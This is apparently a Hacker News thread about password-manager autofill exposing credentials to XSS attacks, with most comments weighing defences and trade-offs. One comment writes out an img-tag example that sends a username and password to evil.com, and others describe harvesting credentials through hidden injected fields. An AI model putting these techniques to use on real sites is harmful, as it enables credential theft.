12 ms·
Autofill in password managers can allow login credentials to be stolen
- ishtanbul 5y agoBitwarden uses manual autofill which is nice. You hit ctrl shift L to fill
- purplecats 5y agoyeah i have it autofill (its a feature now) but it doesnt auto login. so i built an extension that waits for it to fill it in and then performs some safety checks and then logs in. finally the bliss i had with lastpass before i was forced to move to bitwarden.
- joenathanone 5y agoCan I get me some of that extension? https://i.pinimg.com/originals/cb/14/5d/cb145d466f1958ec101f4dadfb231242.jpg https://i.pinimg.com/originals/cb/14/5d/cb145d466f1958ec101f...
- purplecats 5y agohere you go https://hastebin.com/cezuyehaxo.js https://hastebin.com/cezuyehaxo.js
- rvz 5y agoWell it still recognises to autofill in the password on a different subdomain as shown in the PoC by default, which is not good at all. To Downvoters: So in the PoC [0] with the default settings the author is completely wrong about their findings? even if you 'manually' autofill in the fields? So you are saying that the password DOESN'T get extracted out of Bitwarden from a different subdomain than where the login data was stored on by default then? [0] https://marektoth.com/blog/password-managers-autofill/ https://marektoth.com/blog/password-managers-autofill/
- joshuaavalon 5y agoThere is a setting in URL of the password called "Match Detection"[1]. You can change it to "Host" if don't want it to match subdomain. [1]: https://bitwarden.com/help/article/uri-match-detection/#match-detection-options https://bitwarden.com/help/article/uri-match-detection/#matc...
- ViViDboarder 5y ago> by default This is the point parent and the source article are making. Not whether or not it’s possible to be configured more securely.
- Saris 5y agoI wish it wasn't such a weird key combo though, it would be nice to do it with 1 hand.
- fomine3 5y agoI tend to forget that Shift and Ctrl is placed also on right side. (unless the keyboard is < 65%)
- mackrevinack 5y agoi use keepassxc and have auto-type it set to alt+x which is very quick to execute with either hand. you can even just use your thumb to hit both keys at the same time!
- pbhjpbhj 5y agoUse AutoHotKey to change it?
- mjthompson 5y agoGood advice. Ever since Tavis Ormandy set his sights on password managers, I have been a very sceptical user. I still use 1Password, but without the browser extension. Putting autofill aside, there's a couple of other concerns I have. I am hesitant about recommending a password manager to the tech illiterate simply because one piece of malware could compromise the entire vault. In that respect, a sticky note is arguably more secure than a tech illiterate person using a password manager. Also, I have my usual criticism of client-side browser encryption. Anyone who has the technical ability to compromise a cloud-based service can likely take it a step further and modify JavaScript files enabling total vault compromise. There is no easy way for a user to mitigate this risk. Password managers must be a stop-gap measure only until webauthn is more widely deployed. I long for the day when phone-based webauthn keys are the norm, and I can stop fielding questions about password managers from friends and family.
- bmurphy1976 5y agoYou still need 2FA and the 2FA absolutely should NOT be a part of your password manager. Use a different app at the very least. This should help alleviate some of the worst password manager risks.
- tialaramex 5y agoUnder WebAuthn you can have 2FA despite only one authentication flowing from your authenticator to the web site. Nice smartphones (say, a modern Pixel or an iPhone) with fingerprint readers, have as the two factors your fingerprint (something you are) and the phone itself (something you have). The phone signs your authentication, the private information (your fingerprint) never leaves the phone, it just warrants that it checked it (UV bitflag in the signed data) Or say you have a FIDO 2 Security Key from Yubico. As well as the features of the cheaper FIDO 1 Security Key products, this has a PIN verifier. The PIN is something you know, while the Security Key itself is something you have, so that's two factors, once again the UV bitflag is signed. It's simpler, it's easier, it's more secure. And yet, right now I bet an HN reader is implementing yet another shitty SMS-as-2FA hack and we're still in a thread about remote authenticating with passwords - an idea that was already terrible in the 1970s.
- blockarchitech 5y agoI like password managers. It keeps people from writing them down on your desk or a notepad, so I'm all for it. I hate autofill. Any form of autofill, automated, user request, any of it. I would like people to just use a small button to open a 'mini instance' of the password manager, like an instant app (or app clips for iphones), and copy your password that way. Autofill is also a huge security risk, excluding if they use biometric authentication. If they use a pin code, forget it. If an attacker is on your device in the first place, chances are they have your pin code. Autofill needs to be deprecated.
- itsananderson 5y agoIf an attacker is on your device, they very likely have access to your clipboard, so how is that more secure? I cringe whenever my password manager's autofill fails and I have to fall back to copy/pasting, because I know that I'm now storing my password in system memory in plaintext. Most password managers clear the clipboard after some timeout, but that's hardly helpful against an on-device threat
- emodendroket 5y agoIf the attacker has access to your device, you're going to be severely compromised no matter what you do. Why pretend otherwise?
- blockarchitech 5y agoBoth of you're statements are valid. If an attacker has access to your device you are *severely* compromised and you can't do much. I am going off the idea that your password manager clears your clipboard history however, but this is a valid and true statement. The thing is: nothing will be 100% secure. Ever. But if we evolve our security at the same rate loopholes, etc are being found, we can prevent data breaches, identity theft, etc. Before it even happens.
- emodendroket 5y ago
- emodendroket 5y agoPerhaps I'm slow. But if someone's discovered an XSS vulnerability for the site you're on, can't they just as well steal your password when you type it in?
- nhumrich 5y agoExcept, if there is XSS, its usually in user submitted data, like a post. You wouldn't type in your password on a user post or alert box. And the login page is usually on a different page altogether, by itself.
- emodendroket 5y agoI disagree about "usually." I would say it is very common now for the login controls to be in the sidebar and visible wherever. Not to mention how many things you would care about compromising are single-page apps or at least very rich apps that might just use a popover.
- BeefWellington 5y agoThis is kind of irrelevant since you can pretty easily override everything about the XSS payload to make it look like a legitimate login page for the site you're looking for. Depending on the nature of the site, it's possible it won't even stand out as odd even if it loads a login control at a non-"login" URL.
- mukesh610 5y agoHTML5 History API allows for modifying the URL too. If an attacker leverages an XSS they can exactly replicate the login page, URL and all, only limited by payload size and modern protections like CSP.
- treve 5y agoDepends. Many applications will have their login screens on simple server-generated HTML forms without heaps of Javascript, rendered by a service with higher security standards. If an XSS vulnerability appears on some other page, it may not be the same page that normally has a login form. Generally I'd say the gates are kinda open if XSS is possible, but many real exploits do require more than 1 vulnerability working together; so defense in depth applies.
- 1cvmask 5y agoIt's great that he differentiates the two different types of "autofill" in the beginning, and regretfully later on refers to automatic autofill as autofill. - "Autofill can be 2 types: automatic autofill (autofilling a password without user interaction) and manual autofill (autofilling a password after some user interaction - clicking in the password manager's UI). In the following article, the term autofill always means automatic autofill." - When we designed the SaaS Paas password manager we opted for the manual autofill as it requires intent and thus mitigates against many of the highlighted attack vectors that come with "automatic autofill." In addition, the password manager extension has a session timeout and has no static master password at (mitigating against replay attacks). You can only unlock the browser extension with passwordless MFA. The added advantage of this is that you can share your browser comfortably with others. NB: worked on balancing usability and 2fa security.
- ChrisMarshallNY 5y agoMy password manager uses manual autofill. I'm not sure it even has auto autofill. Thanks to AJAX, sites can get text entry immediately. I remember a guy telling me about a store site he went to, and started to fill out the credit card form, but never completed the purchase. He never hit "BUY." They charged his card anyway.
- dylan604 5y agowait, what? that's super duper shady as shit. the darkest of dark patterns, and probably violates something more than my feelings. there's been many a times i've gotten all the way to the review and just before hitting confirm/submit/buy/purchase/complete/etc, i've backed out because I had forgotten something or decided to check another site just to be sure. luckily, nothing like this has ever happened to me.
- MajorBee 5y agoThey could very well store your card information even if they don't fraudulently charge you outright. They could even legitimize this action under the guise of server-side credit card number validation.
- dylan604 5y agoThat's different than charging though. A lot different. There's no real way of knowing what goes on under the hood when putting your info into a web/app form like this, but if I was charged for something without pressing the actual buy button then "Houston, we have a problem".
- MajorBee 5y agoTrue, that would certainly be not as worse and downright illegal as charging. It still seems very slimy, though -- why are you storing my CC details when I never actually made a purchase on your site?
- seattle_spring 5y ago
- TedDoesntTalk 5y agoI don’t see the vulnerability. His demo collects credentials then displays them ... all on the same domain websecurity.dev So what? What am I missing? How will he exfiltrate the data? With JS that posts it to another domain?
- jefftk 5y agoIf the attacker has XSS and gets the password, exfiltration is the easy part. JS offers many options, starting with fetch.
- mcintyre1994 5y agoIf they can run arbitrary JS on the site, can't they just change the target of the login form to their own server and exfiltrate credentials whether you used a password manager to fill them in or not? I'd be much more interested if you could exfiltrate without arbitrary JS, maybe in an img embed with the password injected into the URL or something?
- Sebb767 5y ago> How will he exfiltrate the data? With JS that posts it to another domain? Exactly. Alternatively, you can also use embeds, for example `<img src="https://evil.com/$user/$password https://evil.com/$user/$password" >`. If you have your code running and the credentials, exfiltration is no longer a problem.
- noduerme 5y agoNot mentioned in the article -- a good way to prevent Chrome from ever recognizing the "same" field and attempting to autofill it is to include and randomize a "name=" attribute on all <input> tags, or else name them with a string including a unique user id. This should always be done on web apps. Otherwise the next user on a public computer will see autofill options from previous users.
- mikeryan 5y agoI’d prefer if you didn’t. I like 1Password knowing where to put my credentials when I ask it to.
- noduerme 5y agoIt's not necessary on fields where type="password", since those aren't recorded by Chrome (unless you ask it to remember them). But for all other fields, the security of users on public machines far outweighs the convenience of autofill. And as I said, it can be tailored to individual users' uuids if they're logged in.
- Marsymars 5y agoI don't think "users on public machines" are really a subset of people worth catering to at the expense of others. Public machines without sandboxed user sessions seem largely uworkable in the first place - does anywhere actually do that? (I've never been to a library, school/university or workplace that does.)
- noduerme 5y agoI mostly develop in-house business apps. So a prime example would be an application used at a shared corporate workstation. It's also not just about preventing credentials from leaking -- literally any form that is used by multiple users several times a day will start to accrete autofills, and that needs to be prevented. By the way, are you under the impression that most internet cafes scrub the browser autofill data once a paid user logs out, or that it isn't collected by the time apportionment software in places like China or Vietnam?
- StevePerkins 5y agoIf I weren't using autofill, then I would be re-using the same password for virtually every site. Because memorizing dozens or hundreds of strong passwords, many of which are forced to change periodically, is simply not humanly feasible. So pick your poison. Passwords suck, and you're vulnerable no matter how you approach them. Best you can do is 2FA or biometrics, and even that's not perfect either.
- whack 5y agoYou can use a password manager to store unique passwords, without enabling autofill. I have autofill disabled in my password manager and have to click a button manually, in order to populate my credentials
- crazygringo 5y agoI get that this is a theoretical vulnerability, but there's no way I'm turning off automatic autofill. It's way too convenient. If some site has an XSS vulnerability, then they've already got access to my session cookies, and have the ability to spoof a "you've been logged out, please log back in" screen where people could type in a password anyways. If a site is vulnerable to XSS it's basically game over security-wise. Asking browsers and password managers not to autofill feels more like security theater at that point. That being said, the browsers and password managers that require the username and password fields to actually be genuinely visible to the user on top, non-transparent, in the viewport, are doing the right commonsense thing, and really that seems entirely good enough. (Obviously if you're a political dissident or a target of suspected corporate espionage or something then you'll take greater security precautions like not using a password manager at all for certain accounts -- I'm just talking about normal users here.)
- bakoo 5y agoBitwarden has a hotkey to invoke autofill on a page. Not sure how much safer it actually is, but at least it feels like I'm in control.
- shrimp_emoji 5y agoIt's safer as long as you don't hit it. (And, since the chance of you NOT hitting it is greater than zero, it can be called safer.) Hit it when logging in to HN. It will populate both the set of fields you've highlighted (login) as well as the other set on the page (register). If there were a third, hidden, injected set of fields controlled by an attacker, those would be filled too. The old security-convenience trade-off is an immutable law of the Universe.
- mackrevinack 5y agothis wouldnt happen with keepass's auto-type which sends keystrokes from the desktop app. when you execute the hotkey with the focus on the username input, it types the username first, then sends the tab key, types the password, then sends enter. it wouldn't continue to fill in some hidden fields that are off screen. i would have thought that most browser autofill extensions would be designed to only fill in details once, but who knows
- foysaluix 5y agoPlease add features like secure notes, secure random password generator, credit cards, etc. And add premium features for M365 customers This is my password manager now and going to replace LastPass once above mentioned featured arrived
- throwawayboise 5y agoI disable all autofill as one of the first things I do on a new computer. Not just for passwords, for everything.
- SpeakForMyself 5y agoGod, I hate this paranoid liberal crap that's spreading the tech world like pandemic... we should have a vaccine against this people and thoughts...
- scottmcdot 5y agoIt looks like 1Password _offers_ autofill. That would seem okay?
- yawaworht1978 5y agoWhere is the input of the pwd fields saved? Is it hashed then discarded before it goes to database? Are the input events logged? Clipboard? Never seen an explanation of any of the pwd managers and am curious.
- rudian 5y agoI hate these articles. To steal the password you need malicious code running on the website. Autofill or not your data is taken. The only action that needs to be taken by the browser or password manager is to specifically avoid autofilling multiple accounts. THAT is the problem here, not autofill itself.
- system2 5y agoGod bless KeePass. Never have to deal with these. I just double click and ctrl+v whenever I need to use a pass. Takes extra 3 seconds but I feel like I am not giving anything to the browsers to save.
- stabbles 5y agoNow your security issue is other applications accessing your clipboard. I'm quite aware of this ever since Samsung/Android started adding a whole interface for the clipboard and added integration with the keyboard (it shows some codes in the clipboard sometimes so you can quickly paste). Can the clipboard be accessed from other apps in the background? Probably?
- ViViDboarder 5y agoThis is less secure than autofill, though it automatic autofill. At least autofill won’t enter your password for office.com on off1ce.com, though it’s possible that a human be fooled by a lookalike URL.
- nazrulmum10 5y agoIf login credentials are leaked on a site, it does not necessarily mean that an attacker has accessed the database. He could have just exploited an XSS or other client-side vulnerability and obtained login credentials from users who only followed the advice that they should use a password manager. So please, if recommending password managers, supply that users turn off autofill or be set to fill only upon user request by clicking in password manager's UI.
- xiphias2 5y ago''After all, remembering dozens of unique passwords is almost impossible.'' It's not dosens but hundreds, and it is impossible if the passwords are secure. The article may have good information, but the advice of turning off autofill and going back to remembering passwords is terrible.
- mlang23 5y agoNo shit sherlock!!! This headline reads like "If you shoot yourself in the foot, it might hurt!" :-)
- nmstoker 5y agoI'm confused because on my Pixel 4 where I use the built-in password manager (for Chrome and for apps) you always have to interact with the UI (not just the site) to agree to fill in the password but it's not at all inconvenient and sounds like it wouldn't allow the sort of weaknesses that the article describes. I confirmed on a site that i know has only one set of credentials stored (so it wasn't giving me a false sense of security due to that). Is there more than one form of Google password manager available, ie a regular version and a Pixel version?
- zenexer 5y agoI was fully prepared to berate this article for encouraging manual copy-pasting, which makes people far more prone to phishing attacks. However, it makes this important clarification: > Autofill can be 2 types: automatic autofill (autofilling a password without user interaction) and manual autofill (autofilling a password after some user interaction - clicking in the password manager's UI). In the following article, the term autofill always means automatic autofill.
- stabbles 5y agoI wrote a little blog post about this in 2016: https://medium.com/@stabbles/why-you-should-disable-autofill-bf2e15c65b5c https://medium.com/@stabbles/why-you-should-disable-autofill...
- xg15 5y agoI agree, the danger of password theft seems rather low, but I wonder if this mechanism could be abused for tracking. Imagine you're Facebook and you want to track your users on non-Facebook sites. Traditionally, this would be done with some iframe-embedded widget and 3rd-party cookies. But browsers are increasingly phasing out 3rd-party cookies, so that won't work anymore in the near future. As an alternative, the widget could embed a username and password field. When the browser autofills the field, a script sends the credentials to Facebook, along with the site's URL. The account can be linked up without any cookies involved. (This makes some assumptions I haven't verified: That autofill works in 3rd-party iframes and that the user gesture can be outside the iframe) In more limited scope, this works for first-party cookies as well: If you logged out of a site and cleared your cookies, the site could use the autofilled credentials to associate your guest session with your account even without you actively logging in.
- carlbordum 5y agoIn my opinion, XSS is not a security issue autofill should deal with at all. The real issue is if attackers can trick the autofill to fill in a password for a different site. I did a pentest for a password manager a few years ago, and if I remember correctly this type of exploit had been successful against multiple of the big password managers.
- elpatokamo 5y agoBesides convenience, one of the benefits of autofill is that it offers some implicit feedback about potential phishing sites. For example, your O365 credentials shouldn't autofill on off1ce.com. If I was on a site and noticed that my credentials didn't autofill (or offer autofill) when they normally would, this would immediately raise some red flags for me. The article does looks at how password managers autofill on different levels of subdomains, which is relevant to my point above - a hijacked subdomain would be a problem for many of the password managers he tested.
- inyourtenement 5y agoYour first point doesn't really seem valid when comparing manual to automatic autofill. When I manually autofill, my password manager will show a suggested list of matching passwords. off1ce.com would not suggest my Office password, so I would still be alerted to a phishing site.
- dbriles 5y agoI'm not sure I follow - automatic autofill and manual autofill would both raise red flags by not automatically filling in credentials (automatic autofill) or not suggesting credentials (manual autofill). edit: I think I understand. My first point doesn't show that automatic autofill is better than manual, because both methods will raise red flags. I.e. this isn't a reason to choose automatic over manual autofill. I think this is a fair point. I do think that both autofill methods have an advantage over simple copy/paste, especially given the XSS discussion in other threads here.
- ziml77 5y agoBut autofill also adds a huge amount of safety. If I don't get an password autofill suggestion from my password manager, I'm going to be checking the site I'm on carefully to be sure it's not a phishing site.